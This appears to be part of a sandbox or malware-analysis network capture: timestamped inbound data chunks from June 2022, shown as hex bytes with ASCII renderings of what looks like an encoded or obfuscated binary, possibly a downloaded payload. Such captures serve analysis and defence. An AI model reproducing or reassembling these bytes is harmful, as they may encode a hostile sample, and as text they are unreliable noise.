                                2022-06-26 07:42:48 UTC20INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:42:48 UTC21INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:42:48 UTC22INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:42:48 UTC24INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:42:48 UTC25INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC26INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:42:48 UTC28INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC29INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:42:48 UTC30INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:42:48 UTC32INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:42:48 UTC33INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:42:48 UTC34INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:42:48 UTC36INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:42:48 UTC37INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:42:48 UTC38INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
                                2022-06-26 07:42:48 UTC40INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:42:48 UTC41INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:42:48 UTC42INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:42:48 UTC44INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:42:48 UTC45INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
